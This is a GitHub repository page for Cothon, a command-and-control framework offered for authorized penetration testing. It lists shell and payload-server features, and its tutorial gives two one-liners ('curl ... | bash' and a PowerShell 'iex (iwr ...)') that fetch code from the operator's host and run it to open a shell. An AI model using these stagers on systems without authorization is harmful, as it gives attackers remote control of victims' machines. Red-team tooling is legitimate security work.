Skip to content
/ cothon Public

cothon framework: A stealthy command & control (C2) framework designed for ethical penetration testing and red team operations.

License

Notifications You must be signed in to change notification settings

blue0x1/cothon

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

Cothon Framework

image

Cothon is a stealthy C2 framework built for ethical hacking and red team operations.

Features

- Windows & Linux reverse/bind shells

- Real-time process monitoring, privilege detection, background/foreground control

- File transfers, SSL/TLS support, rate-limited HTTP(S) payload server

- User enumeration, service vulnerability detection, file system exploration

- Dead shell cleanup, encrypted logs, secured shell

Tutorial

  1. Fire it up
python cothon.py --lhost YOUR_IP --ssl
  1. Get shells

Linux

curl YOUR_IP/linux/1337 | bash

Windows

iex (iwr YOUR_IP/windows/1337)

Screenshots

image Main Interface
image
Shells List image
Shell Menu image

Disclaimer

Warning: Use only for authorized testing. Never deploy without permission. Developers assume no liability for misuse.

About

cothon framework: A stealthy command & control (C2) framework designed for ethical penetration testing and red team operations.

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages